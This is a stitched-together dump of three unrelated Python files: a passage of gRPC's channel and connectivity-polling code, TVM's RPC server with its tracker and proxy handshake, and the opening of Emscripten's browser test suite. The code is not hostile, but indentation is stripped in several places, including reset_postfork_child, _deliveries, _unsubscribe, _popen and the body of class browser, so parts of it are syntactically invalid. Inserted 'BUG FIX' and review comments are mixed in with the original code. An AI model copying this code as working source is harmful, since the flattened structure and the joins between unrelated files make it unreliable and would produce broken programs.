self.lock = threading.Lock()
self.channel = channel
self.managed_calls = 0
self.threading = False
def reset_postfork_child(self):
self.managed_calls = 0
def _run_channel_spin_thread(state):
    """Start the daemon "spin" thread that drains the channel's completion
    events and dispatches their tags until no managed calls remain."""

    def channel_spin():
        while True:
            # Park here while a fork is in progress so the child never
            # inherits a thread blocked in the completion queue.
            cygrpc.block_if_fork_in_progress(state)
            event = state.channel.next_call_event()
            if event.completion_type == cygrpc.CompletionType.queue_timeout:
                continue
            call_completed = event.tag(event)
            if call_completed:
                with state.lock:
                    state.managed_calls -= 1
                    if state.managed_calls == 0:
                        # Last managed call finished; let the thread die. A
                        # later call spawns a fresh spin thread.
                        return

    channel_spin_thread = cygrpc.ForkManagedThread(target=channel_spin)
    channel_spin_thread.setDaemon(True)
    channel_spin_thread.start()
def _channel_managed_call_management(state):
    """Return a call-creation function bound to *state*'s channel.

    The returned function also maintains the managed-call count and lazily
    starts the spin thread that services events for all managed calls.
    """

    # pylint: disable=too-many-arguments
    def create(flags, method, host, deadline, metadata, credentials,
               operationses, event_handler, context):
        """Creates a cygrpc.IntegratedCall.

        Args:
          flags: An integer bitfield of call flags.
          method: The RPC method.
          host: A host string for the created call.
          deadline: A float to be the deadline of the created call or None if
            the call is to have an infinite deadline.
          metadata: The metadata for the call or None.
          credentials: A cygrpc.CallCredentials or None.
          operationses: An iterable of iterables of cygrpc.Operations to be
            started on the call.
          event_handler: A behavior to call to handle the events resultant from
            the operations on the call.
          context: Context object for distributed tracing.

        Returns:
          A cygrpc.IntegratedCall with which to conduct an RPC.
        """
        operationses_and_tags = tuple((
            operations,
            event_handler,
        ) for operations in operationses)
        with state.lock:
            call = state.channel.integrated_call(flags, method, host, deadline,
                                                 metadata, credentials,
                                                 operationses_and_tags, context)
            if state.managed_calls == 0:
                # First managed call: start the spin thread that drains
                # completion events.
                state.managed_calls = 1
                _run_channel_spin_thread(state)
            else:
                state.managed_calls += 1
            return call

    return create
class _ChannelConnectivityState(object):
def __init__(self, channel):
self.lock = threading.RLock()
self.channel = channel
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def reset_postfork_child(self):
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def _deliveries(state):
callbacks_needing_update = []
for callback_and_connectivity in state.callbacks_and_connectivities:
callback, callback_connectivity, = callback_and_connectivity
if callback_connectivity is not state.connectivity:
callbacks_needing_update.append(callback)
callback_and_connectivity[1] = state.connectivity
return callbacks_needing_update
def _deliver(state, initial_connectivity, initial_callbacks):
    """Deliver connectivity updates to subscribed callbacks.

    Runs on a dedicated thread; keeps delivering as long as new stale
    callbacks appear, then clears state.delivering and exits.
    """
    connectivity = initial_connectivity
    callbacks = initial_callbacks
    while True:
        for callback in callbacks:
            cygrpc.block_if_fork_in_progress(state)
            try:
                callback(connectivity)
            except Exception:  # pylint: disable=broad-except
                # A misbehaving subscriber must not kill the delivery thread.
                _LOGGER.exception(
                    _CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE)
        with state.lock:
            callbacks = _deliveries(state)
            if callbacks:
                connectivity = state.connectivity
            else:
                state.delivering = False
                return
def _spawn_delivery(state, callbacks):
    """Launch a thread delivering the current connectivity to *callbacks*
    and mark delivery as in progress."""
    delivery_args = (state, state.connectivity, callbacks)
    delivering_thread = cygrpc.ForkManagedThread(
        target=_deliver, args=delivery_args)
    delivering_thread.start()
    state.delivering = True
# NOTE(https://github.com/grpc/grpc/issues/3064): We'd rather not poll.
def _poll_connectivity(state, channel, initial_try_to_connect):
    """Poll channel connectivity and fan updates out to subscribers.

    Runs on a daemon thread until the last subscriber goes away and no
    connection attempt is pending, then resets polling state and exits.
    """
    try_to_connect = initial_try_to_connect
    connectivity = channel.check_connectivity_state(try_to_connect)
    with state.lock:
        state.connectivity = (
            _common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
                connectivity])
        callbacks = tuple(callback
                          for callback, unused_but_known_to_be_none_connectivity
                          in state.callbacks_and_connectivities)
        # Record the just-observed connectivity on every subscription entry.
        for callback_and_connectivity in state.callbacks_and_connectivities:
            callback_and_connectivity[1] = state.connectivity
        if callbacks:
            _spawn_delivery(state, callbacks)
    while True:
        # Wake at least every 200ms so fork handling stays responsive.
        event = channel.watch_connectivity_state(connectivity,
                                                 time.time() + 0.2)
        cygrpc.block_if_fork_in_progress(state)
        with state.lock:
            if not state.callbacks_and_connectivities and not state.try_to_connect:
                # No subscribers and no pending connect request: stop polling.
                state.polling = False
                state.connectivity = None
                break
            try_to_connect = state.try_to_connect
            state.try_to_connect = False
        if event.success or try_to_connect:
            connectivity = channel.check_connectivity_state(try_to_connect)
            with state.lock:
                state.connectivity = (
                    _common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
                        connectivity])
                if not state.delivering:
                    callbacks = _deliveries(state)
                    if callbacks:
                        _spawn_delivery(state, callbacks)
def _subscribe(state, callback, try_to_connect):
    """Register *callback* for connectivity updates on *state*.

    Starts the polling thread on first subscription; otherwise either
    schedules an immediate delivery of the current connectivity or leaves
    the new entry for the running delivery thread to pick up.
    """
    with state.lock:
        if not state.callbacks_and_connectivities and not state.polling:
            # First subscriber: start the connectivity polling thread.
            polling_thread = cygrpc.ForkManagedThread(
                target=_poll_connectivity,
                args=(state, state.channel, bool(try_to_connect)))
            polling_thread.setDaemon(True)
            polling_thread.start()
            state.polling = True
            state.callbacks_and_connectivities.append([callback, None])
        elif not state.delivering and state.connectivity is not None:
            # Connectivity already known and no delivery in flight: deliver
            # the current value to the new subscriber right away.
            _spawn_delivery(state, (callback,))
            state.try_to_connect |= bool(try_to_connect)
            state.callbacks_and_connectivities.append(
                [callback, state.connectivity])
        else:
            state.try_to_connect |= bool(try_to_connect)
            state.callbacks_and_connectivities.append([callback, None])
def _unsubscribe(state, callback):
with state.lock:
for index, (subscribed_callback, unused_connectivity) in enumerate(
state.callbacks_and_connectivities):
if callback == subscribed_callback:
state.callbacks_and_connectivities.pop(index)
break
def _augment_options(base_options, compression):
    """Append compression and user-agent channel args to *base_options*."""
    compression_option = _compression.create_channel_option(compression)
    user_agent_option = ((
        cygrpc.ChannelArgKey.primary_user_agent_string,
        _USER_AGENT,
    ),)
    return tuple(base_options) + compression_option + user_agent_option
class Channel(grpc.Channel):
    """A cygrpc.Channel-backed implementation of grpc.Channel."""

    def __init__(self, target, options, credentials, compression):
        """Constructor.

        Args:
          target: The target to which to connect.
          options: Configuration options for the channel.
          credentials: A cygrpc.ChannelCredentials or None.
          compression: An optional value indicating the compression method to be
            used over the lifetime of the channel.
        """
        self._channel = cygrpc.Channel(
            _common.encode(target), _augment_options(options, compression),
            credentials)
        self._call_state = _ChannelCallState(self._channel)
        self._connectivity_state = _ChannelConnectivityState(self._channel)
        # Register with fork handlers so the channel can be shut down
        # cleanly in a forked child.
        cygrpc.fork_register_channel(self)

    def subscribe(self, callback, try_to_connect=None):
        """Subscribe *callback* to connectivity-state updates."""
        _subscribe(self._connectivity_state, callback, try_to_connect)

    def unsubscribe(self, callback):
        """Remove a previously subscribed connectivity callback."""
        _unsubscribe(self._connectivity_state, callback)

    def unary_unary(self,
                    method,
                    request_serializer=None,
                    response_deserializer=None):
        return _UnaryUnaryMultiCallable(
            self._channel, _channel_managed_call_management(self._call_state),
            _common.encode(method), request_serializer, response_deserializer)

    def unary_stream(self,
                     method,
                     request_serializer=None,
                     response_deserializer=None):
        return _UnaryStreamMultiCallable(
            self._channel, _channel_managed_call_management(self._call_state),
            _common.encode(method), request_serializer, response_deserializer)

    def stream_unary(self,
                     method,
                     request_serializer=None,
                     response_deserializer=None):
        return _StreamUnaryMultiCallable(
            self._channel, _channel_managed_call_management(self._call_state),
            _common.encode(method), request_serializer, response_deserializer)

    def stream_stream(self,
                      method,
                      request_serializer=None,
                      response_deserializer=None):
        return _StreamStreamMultiCallable(
            self._channel, _channel_managed_call_management(self._call_state),
            _common.encode(method), request_serializer, response_deserializer)

    def _unsubscribe_all(self):
        # Drop every connectivity subscription in one shot.
        state = self._connectivity_state
        if state:
            with state.lock:
                del state.callbacks_and_connectivities[:]

    def _close(self):
        self._unsubscribe_all()
        self._channel.close(cygrpc.StatusCode.cancelled, 'Channel closed!')
        cygrpc.fork_unregister_channel(self)

    def _close_on_fork(self):
        # Variant used by fork handlers in the child process.
        self._unsubscribe_all()
        self._channel.close_on_fork(cygrpc.StatusCode.cancelled,
                                    'Channel closed due to fork')

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self._close()
        return False

    def close(self):
        """Close the channel, releasing its resources."""
        self._close()

    def __del__(self):
        # TODO(https://github.com/grpc/grpc/issues/12531): Several releases
        # after 1.12 (1.16 or thereabouts?) add a "self._channel.close" call
        # here (or more likely, call self._close() here). We don't do this today
        # because many valid use cases today allow the channel to be deleted
        # immediately after stubs are created. After a sufficient period of time
        # has passed for all users to be trusted to hang out to their channels
        # for as long as they are in use and to close them after using them,
        # then deletion of this grpc._channel.Channel instance can be made to
        # effect closure of the underlying cygrpc.Channel instance.
        try:
            self._unsubscribe_all()
        except:  # pylint: disable=bare-except
            # Exceptions in __del__ are ignored by Python anyway, but they can
            # keep spamming logs. Just silence them.
            pass
|
server.py | """RPC server implementation.
Note
----
Server is TCP based with the following protocol:
- Initial handshake to the peer
- [RPC_MAGIC, keysize(int32), key-bytes]
- The key is in format
- {server|client}:device-type[:random-key] [-timeout=timeout]
"""
# pylint: disable=invalid-name
from __future__ import absolute_import
import os
import ctypes
import socket
import select
import struct
import logging
import multiprocessing
import subprocess
import time
import sys
import signal
from .._ffi.function import register_func
from .._ffi.base import py_str
from .._ffi.libinfo import find_lib_path
from ..module import load as _load_module
from ..contrib import util
from . import base
from . base import TrackerCode
logger = logging.getLogger('RPCServer')
def _server_env(load_library):
    """Prepare the server-side environment and return its temp workspace.

    Registers the workpath/load_module RPC endpoints and eagerly loads any
    extra libraries named in the colon-separated *load_library* string.
    """
    temp = util.tempdir()

    # pylint: disable=unused-variable
    @register_func("tvm.rpc.server.workpath")
    def get_workpath(path):
        # Resolve a path relative to this session's temporary workspace.
        return temp.relpath(path)

    @register_func("tvm.rpc.server.load_module", override=True)
    def load_module(file_name):
        """Load module from remote side."""
        full_path = temp.relpath(file_name)
        mod = _load_module(full_path)
        logger.info("load_module %s", full_path)
        return mod

    loaded_libs = []
    lib_names = load_library.split(":") if load_library else []
    for lib_name in lib_names:
        resolved = find_lib_path(lib_name)[0]
        loaded_libs.append(ctypes.CDLL(resolved, ctypes.RTLD_GLOBAL))
        logger.info("Load additional library %s", resolved)
    temp.libs = loaded_libs
    return temp
def _serve_loop(sock, addr, load_library):
    """Serve one RPC session on *sock*, then clean up its workspace."""
    temp = _server_env(load_library)
    # Hand the raw file descriptor to the server loop implementation.
    base._ServerLoop(sock.fileno())
    temp.remove()
    logger.info("Finish serving %s", addr)
def _parse_server_opt(opts):
# parse client options
ret = {}
for kv in opts:
if kv.startswith("-timeout="):
ret["timeout"] = float(kv[9:])
return ret
def _listen_loop(sock, port, rpc_key, tracker_addr, load_library, custom_addr):
    """Listening loop of the server master.

    Parameters
    ----------
    sock : Socket
        The listening socket.
    port : int
        Port this server listens on (reported to the tracker).
    rpc_key : str
        Device key used to match this server with clients.
    tracker_addr : tuple or None
        (host, port) of the RPC tracker; None to serve without a tracker.
    load_library : str
        Colon-separated list of additional libraries to load when serving.
    custom_addr : str or None
        Custom address reported to the tracker.
    """

    def _accept_conn(listen_sock, tracker_conn, ping_period=2):
        """Accept connection from the other places.

        Parameters
        ----------
        listen_sock: Socket
            The socket used by listening process.

        tracker_conn : connnection to tracker
            Tracker connection

        ping_period : float, optional
            ping tracker every k seconds if no connection is accepted.
        """
        old_keyset = set()
        # Report resource to tracker
        if tracker_conn:
            matchkey = base.random_key(rpc_key + ":")
            base.sendjson(tracker_conn,
                          [TrackerCode.PUT, rpc_key, (port, matchkey),
                           custom_addr])
            assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
        else:
            matchkey = rpc_key

        unmatch_period_count = 0
        unmatch_timeout = 4
        # Wait until we get a valid connection
        while True:
            if tracker_conn:
                trigger = select.select([listen_sock], [], [], ping_period)
                if not listen_sock in trigger[0]:
                    base.sendjson(tracker_conn,
                                  [TrackerCode.GET_PENDING_MATCHKEYS])
                    pending_keys = base.recvjson(tracker_conn)
                    old_keyset.add(matchkey)
                    # if match key not in pending key set
                    # it means the key is acquired by a client but not used.
                    if matchkey not in pending_keys:
                        unmatch_period_count += 1
                    else:
                        unmatch_period_count = 0
                    # regenerate match key if key is acquired but not used for a while
                    if unmatch_period_count * ping_period > unmatch_timeout + ping_period:
                        logger.info("no incoming connections, regenerate key ...")
                        matchkey = base.random_key(rpc_key + ":", old_keyset)
                        base.sendjson(tracker_conn,
                                      [TrackerCode.PUT, rpc_key, (port, matchkey),
                                       custom_addr])
                        assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
                        unmatch_period_count = 0
                    continue
            conn, addr = listen_sock.accept()
            # Handshake: check magic, then the length-prefixed client key.
            magic = struct.unpack("<i", base.recvall(conn, 4))[0]
            if magic != base.RPC_MAGIC:
                conn.close()
                continue
            keylen = struct.unpack("<i", base.recvall(conn, 4))[0]
            key = py_str(base.recvall(conn, keylen))
            arr = key.split()
            expect_header = "client:" + matchkey
            server_key = "server:" + rpc_key
            if arr[0] != expect_header:
                conn.sendall(struct.pack("<i", base.RPC_CODE_MISMATCH))
                conn.close()
                logger.warning("mismatch key from %s", addr)
                continue
            else:
                conn.sendall(struct.pack("<i", base.RPC_CODE_SUCCESS))
                conn.sendall(struct.pack("<i", len(server_key)))
                conn.sendall(server_key.encode("utf-8"))
                return conn, addr, _parse_server_opt(arr[1:])

    # Server logic
    tracker_conn = None
    while True:
        try:
            # step 1: setup tracker and report to tracker
            if tracker_addr and tracker_conn is None:
                tracker_conn = base.connect_with_retry(tracker_addr)
                tracker_conn.sendall(struct.pack("<i", base.RPC_TRACKER_MAGIC))
                magic = struct.unpack("<i", base.recvall(tracker_conn, 4))[0]
                if magic != base.RPC_TRACKER_MAGIC:
                    raise RuntimeError("%s is not RPC Tracker" % str(tracker_addr))
                # report status of current queue
                cinfo = {"key": "server:" + rpc_key}
                base.sendjson(tracker_conn,
                              [TrackerCode.UPDATE_INFO, cinfo])
                assert base.recvjson(tracker_conn) == TrackerCode.SUCCESS
            # step 2: wait for in-coming connections
            conn, addr, opts = _accept_conn(sock, tracker_conn)
        except (socket.error, IOError):
            # retry when tracker is dropped
            if tracker_conn:
                tracker_conn.close()
                tracker_conn = None
            continue
        except RuntimeError as exc:
            raise exc

        # step 3: serving
        logger.info("connection from %s", addr)
        server_proc = multiprocessing.Process(target=_serve_loop,
                                              args=(conn, addr, load_library))
        # BUG FIX: the attribute was misspelled `deamon`, which silently
        # created an unused attribute and left the flag unset; with
        # `daemon = True` the serving process exits with the master instead
        # of lingering.
        server_proc.daemon = True
        server_proc.start()
        # close from our side.
        conn.close()
        # wait until server process finish or timeout
        server_proc.join(opts.get("timeout", None))
        if server_proc.is_alive():
            logger.info("Timeout in RPC session, kill..")
            server_proc.terminate()
def _connect_proxy_loop(addr, key, load_library):
    """Worker loop that connects to an RPC proxy and serves sessions.

    Parameters
    ----------
    addr : tuple
        (host, port) address of the proxy.
    key : str
        Device key used to match this server with clients on the proxy.
    load_library : str
        Colon-separated list of additional libraries to load when serving.

    Raises
    ------
    RuntimeError
        If the key is already in use on the proxy, the peer is not an RPC
        proxy, or the connection keeps failing beyond the retry budget.
    """
    key = "server:" + key
    retry_count = 0
    max_retry = 5
    retry_period = 5
    while True:
        try:
            sock = socket.socket(base.get_addr_family(addr), socket.SOCK_STREAM)
            sock.connect(addr)
            # Handshake: magic number, then the length-prefixed server key.
            sock.sendall(struct.pack("<i", base.RPC_MAGIC))
            sock.sendall(struct.pack("<i", len(key)))
            sock.sendall(key.encode("utf-8"))
            magic = struct.unpack("<i", base.recvall(sock, 4))[0]
            if magic == base.RPC_CODE_DUPLICATE:
                raise RuntimeError("key: %s has already been used in proxy" % key)
            elif magic == base.RPC_CODE_MISMATCH:
                logger.warning("RPCProxy do not have matching client key %s", key)
            elif magic != base.RPC_CODE_SUCCESS:
                raise RuntimeError("%s is not RPC Proxy" % str(addr))
            keylen = struct.unpack("<i", base.recvall(sock, 4))[0]
            remote_key = py_str(base.recvall(sock, keylen))
            # Options (e.g. -timeout=) ride on the remote key after a space.
            opts = _parse_server_opt(remote_key.split()[1:])
            logger.info("connected to %s", str(addr))
            process = multiprocessing.Process(
                target=_serve_loop, args=(sock, addr, load_library))
            # BUG FIX: the attribute was misspelled `deamon`, which silently
            # created an unused attribute and left the flag unset; with
            # `daemon = True` the serving process exits with the parent.
            process.daemon = True
            process.start()
            sock.close()
            process.join(opts.get("timeout", None))
            if process.is_alive():
                logger.info("Timeout in RPC session, kill..")
                process.terminate()
            retry_count = 0
        except (socket.error, IOError) as err:
            retry_count += 1
            logger.warning("Error encountered %s, retry in %g sec", str(err), retry_period)
            if retry_count > max_retry:
                raise RuntimeError("Maximum retry error: last error: %s" % str(err))
            time.sleep(retry_period)
def _popen(cmd):
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=os.environ)
(out, _) = proc.communicate()
if proc.returncode != 0:
msg = "Server invoke error:\n"
msg += out
raise RuntimeError(msg)
class Server(object):
    """Start RPC server on a separate process.

    This is a simple python implementation based on multi-processing.
    It is also possible to implement a similar C based server with
    TVM runtime which does not depend on the python.

    Parameters
    ----------
    host : str
        The host url of the server.
    port : int
        The port to bind to.
    port_end : int, optional
        The end port to search.
    is_proxy : bool, optional
        Whether the address specified is a proxy.
        If this is true, the host and port actually corresponds to the
        address of the proxy server.
    use_popen : bool, optional
        Whether to use Popen to start a fresh new process instead of fork.
        This is recommended to switch on if we want to do local RPC demonstration
        for GPU devices to avoid fork safety issues.
    tracker_addr: Tuple (str, int) , optional
        The address of RPC Tracker in tuple(host, ip) format.
        If is not None, the server will register itself to the tracker.
    key : str, optional
        The key used to identify the device type in tracker.
    load_library : str, optional
        List of additional libraries to be loaded during execution.
    custom_addr: str, optional
        Custom IP Address to Report to RPC Tracker.
    silent: bool, optional
        Whether run this server in silent mode.
    """

    def __init__(self,
                 host,
                 port=9091,
                 port_end=9199,
                 is_proxy=False,
                 use_popen=False,
                 tracker_addr=None,
                 key="",
                 load_library=None,
                 custom_addr=None,
                 silent=False):
        try:
            # The C++ server loop is only available when runtime was built
            # with USE_RPC=1; 'base' may also be absent entirely (NameError).
            if base._ServerLoop is None:
                raise RuntimeError("Please compile with USE_RPC=1")
        except NameError:
            raise RuntimeError("Please compile with USE_RPC=1")
        self.host = host
        self.port = port
        self.libs = []
        self.custom_addr = custom_addr
        self.use_popen = use_popen
        if silent:
            logger.setLevel(logging.ERROR)
        if use_popen:
            # Spawn a fully fresh interpreter (fork-unsafe backends, e.g. GPU).
            cmd = [sys.executable,
                   "-m", "tvm.exec.rpc_server",
                   "--host=%s" % host,
                   "--port=%s" % port]
            if tracker_addr:
                assert key
                cmd += ["--tracker=%s:%d" % tracker_addr,
                        "--key=%s" % key]
            if load_library:
                cmd += ["--load-library", load_library]
            if custom_addr:
                cmd += ["--custom-addr", custom_addr]
            if silent:
                cmd += ["--silent"]
            # preexec_fn=os.setsid puts the child in its own process group so
            # terminate() can kill the whole group.
            self.proc = subprocess.Popen(cmd, preexec_fn=os.setsid)
            time.sleep(0.5)
        elif not is_proxy:
            sock = socket.socket(base.get_addr_family((host, port)), socket.SOCK_STREAM)
            self.port = None
            for my_port in range(port, port_end):
                try:
                    sock.bind((host, my_port))
                    self.port = my_port
                    break
                except socket.error as sock_err:
                    # 98/48 are EADDRINUSE on Linux/macOS: try the next port.
                    if sock_err.errno in [98, 48]:
                        continue
                    else:
                        raise sock_err
            if not self.port:
                raise ValueError("cannot bind to any port in [%d, %d)" % (port, port_end))
            logger.info("bind to %s:%d", host, self.port)
            sock.listen(1)
            self.sock = sock
            self.proc = multiprocessing.Process(
                target=_listen_loop, args=(
                    self.sock, self.port, key, tracker_addr, load_library,
                    self.custom_addr))
            # BUG FIX: was 'self.proc.deamon' (typo) — the attribute was
            # silently ignored and the child never became a daemon process.
            self.proc.daemon = True
            self.proc.start()
        else:
            self.proc = multiprocessing.Process(
                target=_connect_proxy_loop, args=((host, port), key, load_library))
            # BUG FIX: same 'deamon' typo as above.
            self.proc.daemon = True
            self.proc.start()

    def terminate(self):
        """Terminate the server process (idempotent, safe on partial init)."""
        # Use getattr: __del__ may run on a partially-constructed instance
        # (constructor raised before 'proc'/'use_popen' were assigned), which
        # previously crashed with AttributeError during garbage collection.
        proc = getattr(self, "proc", None)
        if proc is None:
            return
        if getattr(self, "use_popen", False):
            # Kill the whole process group created via os.setsid.
            os.killpg(proc.pid, signal.SIGTERM)
        else:
            proc.terminate()
        self.proc = None

    def __del__(self):
        self.terminate()
|
test_browser.py | # coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_test_file, parameterized, ensure_dir, disabled
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
  """Serve *data* over HTTP on localhost:11111 for the chunked-XHR browser test.

  Handles exactly expectedConns+1 requests (CORS preflights included), then
  returns.  ``chunkSize`` and ``checksum`` are accepted for call-site
  compatibility but unused here — the client side verifies the checksum.
  ``port`` is only used to build the Access-Control-Allow-Origin header.
  """
  class ChunkedServerHandler(BaseHTTPRequestHandler):
    # NOTE: handler methods use 's' instead of the conventional 'self'
    # (kept for minimal churn; it is still the handler instance).
    def sendheaders(s, extra=None, length=None):
      # BUG FIX: the defaults were 'extra=[]' (mutable default argument) and
      # 'length=len(data)' (evaluated at definition time); both replaced with
      # None sentinels resolved per call.
      if length is None:
        length = len(data)
      s.send_response(200)
      s.send_header("Content-Length", str(length))
      s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
      s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
      s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
      s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
      s.send_header("Content-type", "application/octet-stream")
      if support_byte_ranges:
        s.send_header("Accept-Ranges", "bytes")
      for i in (extra or []):
        s.send_header(i[0], i[1])
      s.end_headers()

    def do_HEAD(s):
      s.sendheaders()

    def do_OPTIONS(s):
      # CORS preflight: headers only, zero-length body.
      s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)

    def do_GET(s):
      if s.path == '/':
        s.sendheaders()
      elif not support_byte_ranges:
        s.sendheaders()
        s.wfile.write(data)
      else:
        # Serve the requested byte range, clamped to the data size.
        start, end = s.headers.get("range").split("=")[1].split("-")
        start = int(start)
        end = int(end)
        end = min(len(data) - 1, end)
        length = end - start + 1
        s.sendheaders([], length)
        s.wfile.write(data[start:end + 1])

  # CORS preflight makes OPTIONS requests which we need to account for.
  expectedConns = 22
  httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
  for i in range(expectedConns + 1):
    httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
  """Copy src/<shell_file> to *output_file*, substituting the {{{ SCRIPT }}} placeholder.

  The original used 'input' as a local name, shadowing the builtin; renamed.
  """
  with open(path_from_root('src', shell_file)) as infile, open(output_file, 'w') as outfile:
    outfile.write(infile.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
  """Return a truthy value when the configured test browser is Chrome/Chromium."""
  if not EMTEST_BROWSER:
    return EMTEST_BROWSER
  return 'chrom' in EMTEST_BROWSER.lower()


def no_chrome(note='chrome is not supported'):
  """Decorator: skip the test when running under Chrome, otherwise no-op."""
  if not is_chrome():
    return lambda f: f
  return unittest.skip(note)


def is_firefox():
  """Return a truthy value when the configured test browser is Firefox."""
  if not EMTEST_BROWSER:
    return EMTEST_BROWSER
  return 'firefox' in EMTEST_BROWSER.lower()


def no_firefox(note='firefox is not supported'):
  """Decorator: skip the test when running under Firefox, otherwise no-op."""
  if not is_firefox():
    return lambda f: f
  return unittest.skip(note)
def no_swiftshader(f):
  """Decorator: skip the wrapped test when Chrome runs on the SwiftShader software GL."""
  assert callable(f)

  def decorated(self):
    on_swiftshader = is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER
    if on_swiftshader:
      self.skipTest('not compatible with swiftshader')
    return f(self)

  return decorated
def requires_threads(f):
  """Decorator: skip the wrapped test when EMTEST_LACKS_THREAD_SUPPORT is set."""
  assert callable(f)

  def decorated(self, *args, **kwargs):
    lacks_threads = os.environ.get('EMTEST_LACKS_THREAD_SUPPORT')
    if lacks_threads:
      self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
    return f(self, *args, **kwargs)

  return decorated
def requires_asmfs(f):
  """Decorator: unconditionally skip ASMFS tests.

  ASMFS currently has no maintainer; see
  https://github.com/emscripten-core/emscripten/issues/9534
  """
  assert callable(f)

  def decorated(self, *args, **kwargs):
    self.skipTest('ASMFS is looking for a maintainer')
    return f(self, *args, **kwargs)

  return decorated
# Today we only support the wasm backend so any tests that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix of remove the test.
def no_wasm_backend(note=''):
  """Unconditionally skip (historical fastcomp/llvm-backend exclusion)."""
  # Guard against accidental bare-decorator usage (@no_wasm_backend without parens).
  assert not callable(note)
  return unittest.skip(note)
# Environment-driven skip decorators: CI machines lacking a given capability set
# the corresponding EMTEST_LACKS_* variable to opt out of these tests.  The
# conditions are evaluated once at import time.
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
  """One-time suite setup: chain to BrowserCore and announce the run."""
  super(browser, cls).setUpClass()
  cls.browser_timeout = 60
  banner = 'Running the browser tests. Make sure the browser allows popups from localhost.'
  # Same stdout bytes as the original trio of print() calls.
  print('\n%s\n' % banner)
def setUp(self):
  # NOTE(review): super() is called with BrowserCore as its *first* argument,
  # which starts method resolution *after* BrowserCore and therefore skips
  # BrowserCore.setUp itself (running its parent's setUp instead).  Confirm
  # this is intentional — the conventional form would be super(browser, self).
  super(BrowserCore, self).setUp()
  # avoid various compiler warnings that many browser tests currently generate
  self.emcc_args += [
    '-Wno-pointer-sign',
    '-Wno-int-conversion',
  ]
def test_sdl1_in_emscripten_nonstrict_mode(self):
  # Verifies that SDL1 still links implicitly (no -lSDL) outside strict mode.
  if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
    self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
  # TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
  # system JS libraries are no longer automatically linked to anymore.
  self.btest('hello_world_sdl.cpp', reference='htmltest.png')

def test_sdl1(self):
  # Same program with SDL linked explicitly, both via -lSDL and -s USE_SDL.
  self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
  self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
  # Builds with -g4 (source maps) and opens the page for manual inspection of
  # the mapped C++ sources in the browser devtools; only the artifacts'
  # existence is asserted automatically.
  if not has_browser():
    self.skipTest('need a browser')
  cpp_file = 'src.cpp'
  html_file = 'src.html'
  # browsers will try to 'guess' the corresponding original line if a
  # generated line is unmapped, so if we want to make sure that our
  # numbering is correct, we need to provide a couple of 'possible wrong
  # answers'. thus, we add some printf calls so that the cpp file gets
  # multiple mapped lines. in other words, if the program consists of a
  # single 'throw' statement, browsers may just map any thrown exception to
  # that line, because it will be the only mapped line.
  with open(cpp_file, 'w') as f:
    f.write(r'''
      #include <cstdio>
      int main() {
        printf("Starting test\n");
        try {
          throw 42; // line 8
        } catch (int e) { }
        printf("done\n");
        return 0;
      }
      ''')
  # use relative paths when calling emcc, because file:// URIs can only load
  # sourceContent when the maps are relative paths
  try_delete(html_file)
  try_delete(html_file + '.map')
  self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
  self.assertExists(html_file)
  self.assertExists('src.wasm.map')
  webbrowser.open_new('file://' + html_file)
  print('''
If manually bisecting:
  Check that you see src.cpp among the page sources.
  Even better, add a breakpoint, e.g. on the printf, then reload, then step
  through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')

def test_emscripten_log(self):
  # emscripten_log with source-map support (-g4 plus the source-map pre-js).
